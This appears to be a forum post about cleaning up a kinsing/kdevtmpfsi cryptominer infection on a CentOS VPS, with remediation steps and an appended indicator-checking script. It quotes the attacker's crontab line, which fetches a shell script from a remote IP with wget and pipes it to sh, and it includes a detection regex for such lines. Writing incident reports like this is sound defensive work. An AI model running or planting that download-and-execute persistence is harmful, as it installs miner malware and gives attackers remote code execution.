I've recently been hacked on my VPS (running CentOS 7.6 and CWP, both up to date), and the following files/folders were created:
/tmp/.ICEd-unix
/var/tmp/.ICEd-unix
/tmp/kdevtmpfsi
/var/tmp/kinsing
The following processes were running and using 100% CPU and memory:
kdevtmpfsi
kinsing
Also, the user's crontab had the following line:
* * * * * wget -q -O - http://195.3.146.118/p.sh | sh > /dev/null 2>&1
As of yet, I'm still getting the /tmp/.ICEd-unix and /var/tmp/.ICEd-unix folders created every hour, and I can't figure out what it is.
- Create a cron job as the root user that deletes the dropped files and kills the processes:
#!/bin/bash
# Remove the dropped files and directories and kill the miner processes
rm -f /var/tmp/kinsing
rm -rf /var/tmp/.ICEd-unix
killall -9 kinsing
rm -f /tmp/kdevtmpfsi
rm -rf /tmp/.ICEd-unix
killall -9 kdevtmpfsi
- Remove the crontab line from the affected user.
- Remove all unnecessary open ports in the firewall.
- Disable shell access for the user (from CWP).
- Update all services/projects to the latest versions available in your package manager.
- I found these lines in suexec.log: https://imgur.com/yIliqjJ, therefore an exploit through phpunit. My libraries for the Laravel project weren't up to date.
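A small defender-side check script that reports the indicators named above (the dropped paths, the two process names, and any crontab line that pipes a wget/curl download into a shell). This is an added example, not code from the original post; the paths and process names are taken from the post, the pattern matcher and the /var/spool/cron location are assumptions about a stock CentOS layout.

```shell
#!/bin/bash
# Added example (not from the post): report the kinsing/kdevtmpfsi indicators
# the post lists. Paths and process names come from the post; the crontab
# pattern matches its "wget ... | sh" line without hard-coding the IP.
IOC_PATHS="/tmp/.ICEd-unix /var/tmp/.ICEd-unix /tmp/kdevtmpfsi /var/tmp/kinsing"
IOC_PROCS="kdevtmpfsi kinsing"

# check_ioc_paths PATH...: print each path that exists; return 1 if any does.
check_ioc_paths() {
  found=0
  for p in "$@"; do
    [ -e "$p" ] && { echo "PRESENT: $p"; found=1; }
  done
  return $found
}

# scan_crontab_text: read crontab lines on stdin and print non-comment lines
# that pipe a wget/curl download into a shell; return 1 if any were found.
scan_crontab_text() {
  hits=$(grep -v '^[[:space:]]*#' | grep -E '(wget|curl)[^|]*\|[[:space:]]*(ba)?sh([[:space:]]|$)') || true
  [ -z "$hits" ] && return 0
  printf '%s\n' "$hits" | sed 's/^/SUSPICIOUS CRON: /'
  return 1
}

# scan_process_list: read one process name per line on stdin (as printed by
# `ps -eo comm=`), print those in IOC_PROCS; return 1 if any were found.
scan_process_list() {
  found=0
  while IFS= read -r name; do
    for ioc in $IOC_PROCS; do
      [ "$name" = "$ioc" ] && { echo "RUNNING: $name"; found=1; }
    done
  done
  return $found
}

# scan_host: run all checks on the live system. Needs root to read every
# user's crontab (CentOS keeps them under /var/spool/cron); return 1 on a hit.
scan_host() {
  rc=0
  check_ioc_paths $IOC_PATHS || rc=1
  ps -eo comm= | scan_process_list || rc=1
  cat /var/spool/cron/* /etc/cron.d/* 2>/dev/null | scan_crontab_text || rc=1
  return $rc
}

case "${1:-}" in --scan) scan_host ;; esac
```

Run it as root with `--scan`; a non-zero exit means at least one indicator is still present, which is a quick way to confirm whether the hourly recreation has stopped after cleanup.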